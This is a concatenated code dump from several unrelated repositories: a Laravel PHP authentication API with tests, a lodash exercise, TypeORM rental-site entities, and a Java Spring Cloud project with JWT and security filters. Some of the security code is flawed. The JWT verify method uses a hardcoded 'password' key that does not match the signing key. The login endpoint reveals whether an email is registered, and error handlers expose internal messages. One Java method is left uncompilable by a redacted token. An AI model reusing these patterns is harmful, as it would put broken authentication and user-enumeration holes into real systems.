    const TYPE_MAIN = 'main';
    const TYPE_THUMBNAIL = 'thumbnail';

    /**
     * The attributes that are mass assignable.
     *
     * @var array
     */
    protected $fillable = ['user_id', 'type', 'name', 'path'];

    /**
     * The attributes that should be hidden for arrays.
     *
     * @var array
     */
    protected $hidden = ['deleted_at', 'updated_at', 'created_at'];

    /**
     * Owning user of this avatar.
     *
     * @return BelongsTo
     */
    public function user(): BelongsTo
    {
        return $this->belongsTo(User::class);
    }

    /**
     * Public URL of the stored avatar file.
     *
     * @return string
     */
    public function getLink(): string
    {
        // Equivalent to sprintf('%s/storage/%s', config('app.url'), path.name).
        return config('app.url') . '/storage/' . $this->path . $this->name;
    }
}
<file_sep>/permissions.sh
#!/bin/sh
# Grant the web server group (www-data) ownership of, and write access to,
# the directories Laravel must write at runtime (logs, caches, compiled views).
chgrp -R www-data storage bootstrap/cache
# ug+rwx: owner and group get read/write/execute (execute = directory traversal).
chmod -R ug+rwx storage bootstrap/cache
<file_sep>/tests/Feature/LoginTest.php
<?php
declare(strict_types=1);
namespace Tests\Feature\Common;
use Tests\TestCase;
/**
 * Class LoginTest
 *
 * Feature tests for the POST /api/v1/login endpoint.
 *
 * @package Tests\Feature\Common
 */
class LoginTest extends TestCase
{
    private $url = '/api/v1/login';

    private const CORRECT_RESPONSE_STRUCTURE = [
        'token',
        'avatar',
    ];

    /**
     * POST a credentials payload to the login endpoint.
     *
     * @param array $body
     * @return \Illuminate\Foundation\Testing\TestResponse
     */
    private function postLogin(array $body)
    {
        return $this->json('POST', $this->url, $body);
    }

    public function testCorrectLogin()
    {
        $response = $this->postLogin([
            'email' => '<EMAIL>',
            'password' => '<PASSWORD>'
        ]);

        $response->assertStatus(200)
            ->assertJsonStructure(static::CORRECT_RESPONSE_STRUCTURE);
    }

    public function testRestrictInvalidEmailLogin()
    {
        $email = '<EMAIL>';

        $response = $this->postLogin([
            'email' => $email,
            'password' => '<PASSWORD>'
        ]);

        $response->assertStatus(404)
            ->assertJson([
                'title' => 'Record not found',
                'detail' => sprintf('The user with email: "%s" doesn\'t exist!', $email),
                'status' => 404,
            ]);
    }

    public function testRestrictInvalidPasswordLogin()
    {
        $response = $this->postLogin([
            'email' => '<EMAIL>',
            'password' => '<PASSWORD>'
        ]);

        $response->assertStatus(422)
            ->assertJson([
                'title' => 'Validation Failed',
                'detail' => [
                    'password' => ['<PASSWORD>!']
                ],
                'status' => 422,
            ]);
    }

    public function testRestrictLoginWithNotValidEmail()
    {
        $response = $this->postLogin([
            'email' => $this->getInvalidField(),
            'password' => '<PASSWORD>'
        ]);

        $response->assertStatus(422)
            ->assertJson([
                'title' => 'Validation Failed',
                'detail' => [
                    'email' => ['The email must be a valid email address.']
                ],
                'status' => 422,
            ]);
    }

    public function testRestrictLoginWithEmptyData()
    {
        $response = $this->postLogin([
            'email' => $this->getEmptyField(),
            'password' => $this->getEmptyField()
        ]);

        $response->assertStatus(422)
            ->assertJson([
                'title' => 'Validation Failed',
                'detail' => [
                    'email' => ['The email field is required.'],
                    'password' => ['<PASSWORD>.']
                ],
                'status' => 422,
            ]);
    }
}
<file_sep>/app/Traits/InputCleaner.php
<?php
declare(strict_types=1);
namespace App\Traits;
/**
 * Trait InputCleaner
 *
 * Sanitizes a raw input string and trims surrounding whitespace.
 *
 * @package App\Traits
 */
trait InputCleaner
{
    /**
     * Strip tags / encode special characters via FILTER_SANITIZE_STRING,
     * then trim leading and trailing whitespace.
     *
     * NOTE(review): FILTER_SANITIZE_STRING is deprecated as of PHP 8.1;
     * if the project targets PHP >= 8.1 this needs a replacement
     * (e.g. strip_tags() + htmlspecialchars()) — confirm target PHP version.
     *
     * @param string|null $string
     * @return string
     */
    private function clean($string): string
    {
        return trim(filter_var($string, FILTER_SANITIZE_STRING));
    }
}<file_sep>/app/Traits/RestExceptionHandlerTrait.php
<?php
declare(strict_types=1);
namespace App\Traits;
use Exception;
use Illuminate\Http\Request;
use Illuminate\Auth\AuthenticationException;
use Illuminate\Validation\ValidationException;
use Illuminate\Database\Eloquent\ModelNotFoundException;
use Symfony\Component\HttpKernel\Exception\BadRequestHttpException;
use Symfony\Component\HttpKernel\Exception\MethodNotAllowedHttpException;
/**
 * Trait RestExceptionHandlerTrait
 *
 * Maps framework exceptions to uniform JSON error payloads of the shape
 * {title, detail, status}.
 *
 * @package App\Traits
 */
trait RestExceptionHandlerTrait
{
    /**
     * Creates a new JSON response based on exception type.
     *
     * @param Request $request
     * @param Exception $e
     * @return \Illuminate\Http\JsonResponse
     */
    protected function getJsonResponseForException(Request $request, Exception $e)
    {
        if ($this->isBadRequest($e)) {
            return $this->badRequest($e);
        }
        if ($this->isNotAuthentificated($e)) {
            return $this->notAuthentificated();
        }
        if ($this->isModelNotFoundException($e)) {
            return $this->modelNotFound($e);
        }
        if ($this->isMethodNotAllowed($e)) {
            return $this->methodNotAllowed($e);
        }
        if ($this->isRequestValidationException($e)) {
            return $this->validationFailed($e);
        }

        // Anything unrecognized is reported as a 500.
        return $this->internalServerError($e);
    }

    /**
     * Wrap a payload in a JSON response.
     *
     * @param array|null $payload
     * @param int $statusCode
     * @return \Illuminate\Http\JsonResponse
     */
    protected function jsonResponse(array $payload = null, $statusCode = 200)
    {
        return response()->json($payload ?: [], $statusCode);
    }

    /**
     * JSON response for a bad request exception.
     *
     * @param BadRequestHttpException $exception
     * @param string $message
     * @param int $statusCode
     * @return \Illuminate\Http\JsonResponse
     */
    protected function badRequest($exception, $message = 'Bad Request', $statusCode = 400)
    {
        $body = [
            'title' => $message,
            'detail' => $exception->getMessage(),
            'status' => $statusCode,
        ];

        return $this->jsonResponse($body, $statusCode);
    }

    /**
     * JSON response for a not-authenticated error.
     *
     * @param int $statusCode
     * @return \Illuminate\Http\JsonResponse
     */
    protected function notAuthentificated($statusCode = 401)
    {
        $body = [
            'title' => 'You are not authenticated in the system.',
            'detail' => 'Check if token exists in "Authorization" header',
            'status' => $statusCode,
        ];

        return $this->jsonResponse($body, $statusCode);
    }

    /**
     * JSON response for an Eloquent model-not-found exception.
     *
     * @param ModelNotFoundException $exception
     * @param string $message
     * @param int $statusCode
     * @return \Illuminate\Http\JsonResponse
     */
    protected function modelNotFound($exception, $message = 'Record not found', $statusCode = 404)
    {
        $body = [
            'title' => $message,
            'detail' => $exception->getMessage(),
            'status' => $statusCode,
        ];

        return $this->jsonResponse($body, $statusCode);
    }

    /**
     * JSON response for a Method Not Allowed exception.
     *
     * @param MethodNotAllowedHttpException $exception
     * @param string $message
     * @param int $statusCode
     * @return \Illuminate\Http\JsonResponse
     */
    protected function methodNotAllowed($exception, $message = 'Method Not Allowed', $statusCode = 405)
    {
        $body = [
            'title' => $message,
            // Exposes the Allow header(s) advertising the permitted verbs.
            'detail' => $exception->getHeaders(),
            'status' => $statusCode,
        ];

        return $this->jsonResponse($body, $statusCode);
    }

    /**
     * JSON response for a validation exception.
     *
     * @param ValidationException $exception
     * @param int $statusCode
     * @return \Illuminate\Http\JsonResponse
     */
    protected function validationFailed($exception, $statusCode = 422)
    {
        $body = [
            'title' => 'Validation Failed',
            'detail' => $exception->errors(),
            'status' => $statusCode,
        ];

        return $this->jsonResponse($body, $statusCode);
    }

    /**
     * JSON response for an internal server error.
     *
     * @param \Exception $exception
     * @param int $statusCode
     * @return \Illuminate\Http\JsonResponse
     */
    protected function internalServerError($exception, $statusCode = 500)
    {
        $body = [
            'title' => 'Internal Server Error',
            'detail' => $exception->getMessage(),
            'status' => $statusCode,
        ];

        return $this->jsonResponse($body, $statusCode);
    }

    /**
     * Determines if the given exception is a bad request.
     *
     * @param Exception $e
     * @return bool
     */
    protected function isBadRequest(Exception $e): bool
    {
        return $e instanceof BadRequestHttpException;
    }

    /**
     * Determines if the given exception means the user is not authenticated.
     *
     * @param Exception $e
     * @return bool
     */
    protected function isNotAuthentificated(Exception $e): bool
    {
        return $e instanceof AuthenticationException;
    }

    /**
     * Determines if the given exception is an Eloquent model not found.
     *
     * @param Exception $e
     * @return bool
     */
    protected function isModelNotFoundException(Exception $e): bool
    {
        return $e instanceof ModelNotFoundException;
    }

    /**
     * Determines if the given exception is a Method Not Allowed exception.
     *
     * @param Exception $e
     * @return bool
     */
    protected function isMethodNotAllowed(Exception $e): bool
    {
        return $e instanceof MethodNotAllowedHttpException;
    }

    /**
     * Determines if the given exception is a validation exception.
     *
     * @param Exception $e
     * @return bool
     */
    protected function isRequestValidationException(Exception $e): bool
    {
        return $e instanceof ValidationException;
    }
}<file_sep>/app/Providers/AvatarServiceProvider.php
<?php
declare(strict_types=1);
namespace App\Providers;
use App\Handlers\AvatarHandler;
use Illuminate\Support\ServiceProvider;
/**
 * Class AvatarServiceProvider
 *
 * Deferred provider that builds AvatarHandler instances on demand from an
 * uploaded file and its owning user.
 *
 * @package App\Providers
 */
class AvatarServiceProvider extends ServiceProvider
{
    /**
     * Indicates if loading of the provider is deferred.
     *
     * @var bool
     */
    protected $defer = true;

    /**
     * Register services.
     *
     * @return void
     */
    public function register()
    {
        $this->app->singleton(AvatarHandler::class, function ($container, $parameters) {
            return new AvatarHandler($parameters['file'], $parameters['user']);
        });
    }

    /**
     * Get the services provided by the provider.
     *
     * @return array
     */
    public function provides()
    {
        return [AvatarHandler::class];
    }
}
<file_sep>/app/Http/Controllers/Api/SecurityController.php
<?php
declare(strict_types=1);
namespace App\Http\Controllers\Api;
use DB;
use App\Models\User;
use App\Handlers\AvatarHandler;
use App\Http\Controllers\Controller;
use App\Http\Requests\Api\LoginRequest;
use App\Http\Requests\Api\RegisterRequest;
use App\Http\Resources\User as UserResource;
use Illuminate\Validation\ValidationException;
use Illuminate\Database\Eloquent\ModelNotFoundException;
/**
 * Class SecurityController
 *
 * Login and registration endpoints.
 *
 * @package App\Http\Controllers\Api
 */
class SecurityController extends Controller
{
    /**
     * Authenticate a user by email and password.
     *
     * @param LoginRequest $request
     * @return \Illuminate\Http\JsonResponse
     * @throws ModelNotFoundException when no user has the given email
     * @throws ValidationException when the password does not match
     */
    public function login(LoginRequest $request)
    {
        $email = $request->input('email');
        $user = User::where('email', '=', $email)->first();

        if (!$user) {
            throw new ModelNotFoundException(
                sprintf('The user with email: "%s" doesn\'t exist!', $email)
            );
        }

        $hasher = app()->make('hash');
        if (!$hasher->check($request->input('password'), $user->password)) {
            throw ValidationException::withMessages([
                'password' => ['Password is incorrect!'],
            ]);
        }

        return response()->json(new UserResource($user));
    }

    /**
     * Create a new user account, optionally storing an uploaded avatar.
     *
     * Runs inside a transaction so a failed avatar upload rolls back the
     * user row as well.
     *
     * @param RegisterRequest $request
     * @return \Illuminate\Http\JsonResponse
     */
    public function register(RegisterRequest $request)
    {
        DB::transaction(function () use ($request, &$user) {
            $hasher = app()->make('hash');

            $user = User::create([
                'email' => $request->input('email'),
                'password' => $hasher->make($request->input('password'))
            ]);

            $file = $request->file('avatar');
            if ($file) {
                $avatarHandler = app()->make(AvatarHandler::class, compact('file', 'user'));
                $avatarHandler->handle();
            }
        });

        return response()->json(new UserResource($user), 201);
    }
}
| 97d690627d2ed6c637eae891bf8de570e0d5079c | [
"Markdown",
"PHP",
"Shell"
] | 25 | PHP | VBetsun/doit-mailer | 762804fc98eecd512066c83489d7779cde7bc1f1 | c71e57fde9ddc2a09402c52475e1a9b32e333f09 |
refs/heads/main | <file_sep># lodash
Codecademy lodash project
<file_sep>const _ = {
clamp(number,lower,upper){
let lowerClampedValue = Math.max(number,lower);
let clampedValue = Math.min(lowerClampedValue,upper);
return clampedValue;
},
inRange(number,start,end){
if(end === undefined){
end = start
start = 0
}
if(start > end){
let temp = end;
end = start;
start = temp;
}
let isInRange = start <= number && number < end
return isInRange;
},
words(string){
let words = string.split(' ')
return words;
},
pad(string,length){
if(length <= string.length){
return string;
};
const startPaddingLength = Math.floor((length - string.length) / 2);
const endPaddingLength = length - string.length - startPaddingLength;
const paddedString = ' '.repeat(startPaddingLength) + string + ' '.repeat(endPaddingLength);
return paddedString;
}
};
// Do not write or modify code below this line.
module.exports = _; | 38695b2270109d5d7619bdeb9b9f1284e6d243c0 | [
"Markdown",
"JavaScript"
] | 2 | Markdown | matiasmarangone/lodash | 4c33a122fb4092ec7cae9b85fe711028a9ca5591 | 1af355c3177357b253f3ab6145111db9087083ee |
refs/heads/master | <repo_name>asyrafchelah/Airbnb<file_sep>/src/entity/Property.ts
import { Entity, PrimaryGeneratedColumn, Column, OneToMany, ManyToOne, JoinColumn, ManyToMany } from "typeorm";
import { Booking } from "./Booking";
import { Owner } from "./Owner";
import { Tag } from "./Tag";
import { Review } from "./Review";
import { Locality } from "./Locality";
@Entity()
export class Property {
@PrimaryGeneratedColumn()
id: number;
@Column()
address: string;
@ManyToOne(type =>Owner,owner=> owner.properties)
@JoinColumn({name:"owner_id"})
owner:Owner
@Column()
created_at: Date;
@Column()
update_at: Date;
@OneToMany(type => Booking, booking=> booking.property)
bookings:Booking[]
@ManyToMany(type => Tag, tag => tag.properties)
tags: Tag[]
@OneToMany(type => Review, review=> review.property)
reviews:Review[]
@ManyToMany(type => Locality, locality => locality.properties)
localities: Tag[]
}
<file_sep>/src/entity/Booking.ts
import { Entity, PrimaryGeneratedColumn, Column, ManyToOne, JoinColumn, OneToMany } from "typeorm";
import { User } from "./User";
import { Property } from "./Property";
import { Payment } from "./Payment";
@Entity()
export class Booking {
@PrimaryGeneratedColumn()
id: number;
@ManyToOne(type =>Property,property=> property.bookings)
@JoinColumn({name:"property_id"})
property:Property
@Column()
booking_date: Date;
@ManyToOne(type =>User,user=> user.bookings)
@JoinColumn({name:"user_id"})
user:User
@Column()
check_out: Date;
@Column()
created_at: Date;
@Column()
updated_at: Date;
@OneToMany(type => Payment, payment=> payment.booking)
payments:Payment[]
}
<file_sep>/src/entity/User.ts
import {Entity, PrimaryGeneratedColumn, Column, OneToMany} from "typeorm";
import { Booking } from "./Booking";
import { Review } from "./Review";
import { Comment } from "./Comment";
@Entity()
export class User {
@PrimaryGeneratedColumn()
id: number;
@Column()
name: string;
@Column()
email: string;
@Column()
contact_no: number;
@Column()
created_at: Date;
@Column()
update_at : Date;
@OneToMany(type => Booking, booking=> booking.user)
bookings:Booking[]
@OneToMany(type => Comment, comment=> comment.user)
comments:Comment[]
}
<file_sep>/src/entity/Review.ts
import { Entity, PrimaryGeneratedColumn, Column, OneToMany, ManyToOne, JoinColumn, ManyToMany } from "typeorm";
import { Property } from "./Property";
import { User } from "./User";
import { Comment } from "./Comment";
@Entity()
export class Review {
@PrimaryGeneratedColumn()
id: number;
@Column()
booking_date: Date;
@ManyToOne(type =>Property,property=> property.reviews)
@JoinColumn({name:"property_id"})
property:Property
@Column()
overall_rating:number;
@Column()
location_rating:number;
@Column()
cleanliness_rating:number;
@Column()
value_rating:number;
@Column()
communication_rating:number;
@Column()
amenities_rating:number;
@OneToMany(type => Comment, comment=> comment.user)
comments:Comment[]
}
<file_sep>/src/entity/Payment.ts
import { Entity, PrimaryGeneratedColumn, Column, ManyToOne, JoinColumn } from "typeorm";
import { Booking } from "./Booking";
@Entity()
export class Payment {
@PrimaryGeneratedColumn()
id: number;
@Column()
status: string;
@Column()
amount: number;
@ManyToOne(type =>Booking,booking=> booking.payments)
@JoinColumn({name:"booking_id"})
booking:Booking
}
<file_sep>/src/migration/1573081041555-PhaseTwo.ts
import {MigrationInterface, QueryRunner} from "typeorm";
export class PhaseTwo1573081041555 implements MigrationInterface {
name = 'PhaseTwo1573081041555'
public async up(queryRunner: QueryRunner): Promise<any> {
await queryRunner.query(`CREATE TABLE "tag" ("id" int NOT NULL IDENTITY(1,1), "label" nvarchar(255) NOT NULL, CONSTRAINT "PK_8e4052373c579afc1471f526760" PRIMARY KEY ("id"))`, undefined);
await queryRunner.query(`CREATE TABLE "payment" ("id" int NOT NULL IDENTITY(1,1), "status" nvarchar(255) NOT NULL, "amount" int NOT NULL, "booking_id" int, CONSTRAINT "PK_fcaec7df5adf9cac408c686b2ab" PRIMARY KEY ("id"))`, undefined);
await queryRunner.query(`CREATE TABLE "properties_tags" ("tag_id" int NOT NULL, "property_id" int NOT NULL, CONSTRAINT "PK_0039f58ecbac69887fc3acaae38" PRIMARY KEY ("tag_id", "property_id"))`, undefined);
await queryRunner.query(`CREATE INDEX "IDX_23c6bef3a45883fc85afa2477e" ON "properties_tags" ("tag_id") `, undefined);
await queryRunner.query(`CREATE INDEX "IDX_b70000a624e1f0ab245318ef70" ON "properties_tags" ("property_id") `, undefined);
await queryRunner.query(`ALTER TABLE "payment" ADD CONSTRAINT "FK_cee78453638dfaf440f1aa63c26" FOREIGN KEY ("booking_id") REFERENCES "booking"("id") ON DELETE NO ACTION ON UPDATE NO ACTION`, undefined);
await queryRunner.query(`ALTER TABLE "properties_tags" ADD CONSTRAINT "FK_23c6bef3a45883fc85afa2477e0" FOREIGN KEY ("tag_id") REFERENCES "tag"("id") ON DELETE CASCADE ON UPDATE NO ACTION`, undefined);
await queryRunner.query(`ALTER TABLE "properties_tags" ADD CONSTRAINT "FK_b70000a624e1f0ab245318ef709" FOREIGN KEY ("property_id") REFERENCES "property"("id") ON DELETE CASCADE ON UPDATE NO ACTION`, undefined);
}
public async down(queryRunner: QueryRunner): Promise<any> {
await queryRunner.query(`ALTER TABLE "properties_tags" DROP CONSTRAINT "FK_b70000a624e1f0ab245318ef709"`, undefined);
await queryRunner.query(`ALTER TABLE "properties_tags" DROP CONSTRAINT "FK_23c6bef3a45883fc85afa2477e0"`, undefined);
await queryRunner.query(`ALTER TABLE "payment" DROP CONSTRAINT "FK_cee78453638dfaf440f1aa63c26"`, undefined);
await queryRunner.query(`DROP INDEX "IDX_b70000a624e1f0ab245318ef70" ON "properties_tags"`, undefined);
await queryRunner.query(`DROP INDEX "IDX_23c6bef3a45883fc85afa2477e" ON "properties_tags"`, undefined);
await queryRunner.query(`DROP TABLE "properties_tags"`, undefined);
await queryRunner.query(`DROP TABLE "payment"`, undefined);
await queryRunner.query(`DROP TABLE "tag"`, undefined);
}
}
| 2e131248ea456e5684c0a026fd925bf15d9e3e59 | [
"TypeScript"
] | 6 | TypeScript | asyrafchelah/Airbnb | f63337d672d6f7332d79d00c6b06bcbbefd67198 | 5611d80c83def907becca1f3bd52b882bef3e762 |
refs/heads/master | <repo_name>tang-shao/tang-shao-micro-cloud<file_sep>/micro-cloud-generator/src/main/resources/generator.properties
dataSource.url=jdbc:mysql://localhost:3306/micro-cloud?useUnicode=true&characterEncoding=utf-8&serverTimezone=Asia/Shanghai
dataSource.driverName=com.mysql.jdbc.Driver
dataSource.username=root
dataSource.password=<PASSWORD>
package.base=com.cloud.modules<file_sep>/micro-cloud-common/src/main/java/com/cloud/modules/system/model/GeneratorModel.java
package com.cloud.modules.system.model;
import io.swagger.annotations.ApiModel;
import io.swagger.annotations.ApiModelProperty;
import lombok.Data;
@Data
@ApiModel(value = "代码生成器对象",description = "代码生成器对象")
public class GeneratorModel {
@ApiModelProperty("模块名称")
private String modelName;
@ApiModelProperty("项目名称,代码生成在哪个项目下面")
private String servicesName;
@ApiModelProperty("表名,有多张请用英文逗号分割")
private String tableName;
@ApiModelProperty("作者")
private String author;
}
<file_sep>/micro-cloud-security/src/main/java/com/cloud/security/TokenFilter.java
package com.cloud.security;
import cn.hutool.core.util.StrUtil;
import com.cloud.bo.SysUserDetails;
import com.cloud.common.constant.CacheConstant;
import com.cloud.common.constant.CommonConstant;
import com.cloud.common.exception.MicroCloudException;
import com.cloud.config.JwtConfig;
import com.cloud.modules.system.entity.LoginUser;
import com.cloud.modules.system.entity.SysUser;
import com.cloud.modules.utils.JwtUtil;
import com.cloud.modules.utils.RedisUtils;
import com.cloud.util.JwtTokenUtil;
import lombok.extern.slf4j.Slf4j;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.security.authentication.UsernamePasswordAuthenticationToken;
import org.springframework.security.core.Authentication;
import org.springframework.security.core.context.SecurityContextHolder;
import org.springframework.security.core.userdetails.UserDetails;
import org.springframework.security.core.userdetails.UserDetailsService;
import org.springframework.security.web.authentication.WebAuthenticationDetailsSource;
import org.springframework.util.StringUtils;
import org.springframework.web.filter.GenericFilterBean;
import org.springframework.web.filter.OncePerRequestFilter;
import javax.servlet.FilterChain;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
/**
* JWT 自定义拦截器 主要验证 请求中的token 是否非法 是否已过期 是否已存在 .....
* Tang Can
*/
@Slf4j
public class TokenFilter extends GenericFilterBean {
/**
* 牛皮 不知道为啥子 换一个接口 注入不进来
*/
// @Autowired
// private RedisUtils redisUtils;
private RedisUtils redisUtils = new RedisUtils();
@Override
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse,
FilterChain filterChain) throws IOException, ServletException {
String token = ((HttpServletRequest)servletRequest).getHeader(JwtConfig.HEADER);
if(token != null){
String username = JwtTokenUtil.getUserNameFromToken(token);
if(username != null && SecurityContextHolder.getContext().getAuthentication() == null){
LoginUser loginUser = (LoginUser) redisUtils.get(CacheConstant.SYS_USERS_CACHE + ":" + token);
SysUserDetails loginDetails = new SysUserDetails(loginUser);
if(JwtTokenUtil.validateToken(token,loginDetails)){
UsernamePasswordAuthenticationToken authentication =
new UsernamePasswordAuthenticationToken(loginDetails, null);
SecurityContextHolder.getContext().setAuthentication(authentication);
}
}
}
filterChain.doFilter(servletRequest,servletResponse);
}
}
<file_sep>/micro-cloud-security/src/main/java/com/cloud/bo/SysUserDetails.java
package com.cloud.bo;
import com.cloud.modules.system.entity.LoginUser;
import com.cloud.modules.system.entity.SysUser;
import org.springframework.security.core.GrantedAuthority;
import org.springframework.security.core.userdetails.UserDetails;
import java.util.Collection;
public class SysUserDetails implements UserDetails {
private LoginUser loginUser;
public SysUserDetails(LoginUser loginUser){
this.loginUser = loginUser;
}
@Override
public Collection<? extends GrantedAuthority> getAuthorities() {
return null;
}
@Override
public String getPassword() {
return loginUser.getPassword();
}
@Override
public String getUsername() {
return loginUser.getUsername();
}
@Override
public boolean isAccountNonExpired() {
return true;
}
@Override
public boolean isAccountNonLocked() {
return true;
}
@Override
public boolean isCredentialsNonExpired() {
return true;
}
@Override
public boolean isEnabled() {
return loginUser.getStatus().equals("1");
}
}
<file_sep>/micro-cloud-security/pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<parent>
<artifactId>micro-cloud</artifactId>
<groupId>com.cloud</groupId>
<version>1.0-SNAPSHOT</version>
</parent>
<modelVersion>4.0.0</modelVersion>
<artifactId>micro-cloud-security</artifactId>
<packaging>jar</packaging>
<properties>
<jjwt.version>0.11.1</jjwt.version>
</properties>
<dependencies>
<!--Spring boot 安全框架-->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-security</artifactId>
</dependency>
<!-- Java图形验证码 -->
<dependency>
<groupId>com.github.whvcse</groupId>
<artifactId>easy-captcha</artifactId>
<version>1.6.2</version>
</dependency>
<!-- jwt -->
<dependency>
<groupId>io.jsonwebtoken</groupId>
<artifactId>jjwt-api</artifactId>
<version>${jjwt.version}</version>
</dependency>
<dependency>
<groupId>io.jsonwebtoken</groupId>
<artifactId>jjwt-impl</artifactId>
<version>${jjwt.version}</version>
</dependency>
<dependency>
<groupId>io.jsonwebtoken</groupId>
<artifactId>jjwt-jackson</artifactId>
<version>${jjwt.version}</version>
</dependency>
<!--引用公共-->
<dependency>
<groupId>com.cloud</groupId>
<artifactId>micro-cloud-common</artifactId>
<version>${micro-cloud.version}</version>
</dependency>
</dependencies>
</project><file_sep>/micro-cloud-common/src/main/java/com/cloud/modules/utils/JwtUtil.java
package com.cloud.modules.utils;
import cn.hutool.crypto.SecureUtil;
import com.auth0.jwt.JWT;
import com.auth0.jwt.JWTVerifier;
import com.auth0.jwt.algorithms.Algorithm;
import com.auth0.jwt.exceptions.JWTDecodeException;
import com.auth0.jwt.interfaces.DecodedJWT;
import com.cloud.common.constant.CacheConstant;
import com.cloud.common.exception.MicroCloudException;
import com.cloud.modules.system.entity.LoginUser;
import lombok.extern.slf4j.Slf4j;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;
import java.util.Date;
/**
* JWT工具类
*/
@Slf4j
public class JwtUtil {
// Token过期时间30分钟
public static final long EXPIRE_TIME = 30 * 60 * 1000;
/**
* 校验Token是否正确
*/
public static boolean verify(String token, String username, String password) {
try {
// 根据密码生成JWT验证器
Algorithm algorithm = Algorithm.HMAC256(SecureUtil.md5("password"));
JWTVerifier verifier = JWT.require(algorithm).withClaim("username", username).build();
// 校验TOKEN
DecodedJWT jwt = verifier.verify(token);
return true;
}catch (Exception e){
return false;
}
}
/**
* 获得token中的信息无需secret解密也能获得
*/
public static String getUsername(String token){
try {
// 对token进行解码
DecodedJWT jwt = JWT.decode(token);
return jwt.getClaim("username").asString();
}catch (JWTDecodeException e){
return null;
}
}
/**
* 生成签名,过期时间为30min
*/
public static String sign(String username, String password){
Date date = new Date(System.currentTimeMillis() + EXPIRE_TIME);
Algorithm algorithm = Algorithm.HMAC256(SecureUtil.md5(password));
// 带上用户名
return JWT.create().withClaim("username", username).withExpiresAt(date).sign(algorithm);
}
/**
* 从request 中的token 获取用户信息
*/
public static String getUserNameByToken(HttpServletRequest request){
String accessToken = request.getHeader("X-Access-Token");
String username = getUsername(accessToken);
if(StringUtils.isBlank(username)){
throw new MicroCloudException("未获取到用户");
}
return username;
}
/**
* 根据request中的token获取用户信息
*/
public static LoginUser getLoginUser(){
HttpServletRequest request = SpringContextUtils.getHttpServletRequest();
if(request == null){
log.warn(" 非request方式访问!! ");
return null;
}
String accessToken = request.getHeader("X-Access-Token");
if(StringUtils.isBlank(accessToken)){
return null;
}
String username = getUsername(accessToken);
if(StringUtils.isBlank(username)){
throw new MicroCloudException("未获取到用户");
}
RedisUtils redisUtil = SpringContextUtils.getApplicationContext().getBean(RedisUtils.class);
// 从缓存中获取
LoginUser sysUser = (LoginUser) redisUtil.get(CacheConstant.SYS_USERS_CACHE_JWT +":" +username);
return sysUser;
}
/**
* 从session中获取变量
*/
public static String getSessionData(String key){
// 得到${} 后面的值
String moshi = "";
if(key.indexOf("}") != -1){
moshi = key.substring(key.indexOf("}")+1);
}
String returnValue = null;
if (key.contains("#{")) {
key = key.substring(2,key.indexOf("}"));
}
if(StringUtils.isNotEmpty(key)){
HttpSession session = SpringContextUtils.getHttpServletRequest().getSession();
returnValue = (String) session.getAttribute(key);
}
if(returnValue!=null) returnValue = returnValue + moshi;
return returnValue;
}
// Ad-hoc manual test of getUsername().
// NOTE(review): the token literal has been redacted ("<KEY>" placeholders) and the
// first string is left unterminated — this method does not compile as-is and must
// be restored with a real JWT before use.
public static void main(String[] args) {
String token = "<KEY> +
"<KEY>_aRlMgOdlZoWFFKB_giv<KEY>";
System.out.println(JwtUtil.getUsername(token));
}
}
<file_sep>/pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>com.cloud</groupId>
<artifactId>micro-cloud</artifactId>
<version>1.0-SNAPSHOT</version>
<modules>
<module>micro-cloud-common</module>
<module>micro-cloud-gateway</module>
<module>micro-cloud-monitor</module>
<module>micro-cloud-system</module>
<module>micro-cloud-shiro</module>
<module>micro-cloud-security</module>
<module>micro-cloud-demo</module>
<module>micro-cloud-generator</module>
</modules>
<packaging>pom</packaging>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.1.3.RELEASE</version>
<relativePath/>
</parent>
<properties>
<micro-cloud.version>1.0-SNAPSHOT</micro-cloud.version>
<java.version>1.8</java.version>
<project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<mybatis-plus.version>3.3.2</mybatis-plus.version>
<druid.version>1.1.17</druid.version>
<commons.version>2.6</commons.version>
<aliyun-java-sdk-core.version>3.2.3</aliyun-java-sdk-core.version>
<aliyun-java-sdk-dysmsapi.version>1.0.0</aliyun-java-sdk-dysmsapi.version>
<aliyun.oss.version>3.6.0</aliyun.oss.version>
<guava.version>26.0-jre</guava.version>
<swagger2.version>2.9.2</swagger2.version>
<docker.host>http://192.168.31.208:2375</docker.host>
<docker.maven.plugin.version>1.2.2</docker.maven.plugin.version>
<logstash-logback.version>5.3</logstash-logback.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-mail</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-aop</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
<!-- commons -->
<dependency>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
<version>${commons.version}</version>
</dependency>
<dependency>
<groupId>commons-lang</groupId>
<artifactId>commons-lang</artifactId>
<version>${commons.version}</version>
</dependency>
<!-- freemarker -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-freemarker</artifactId>
</dependency>
<!-- Lombok -->
<dependency>
<groupId>org.projectlombok</groupId>
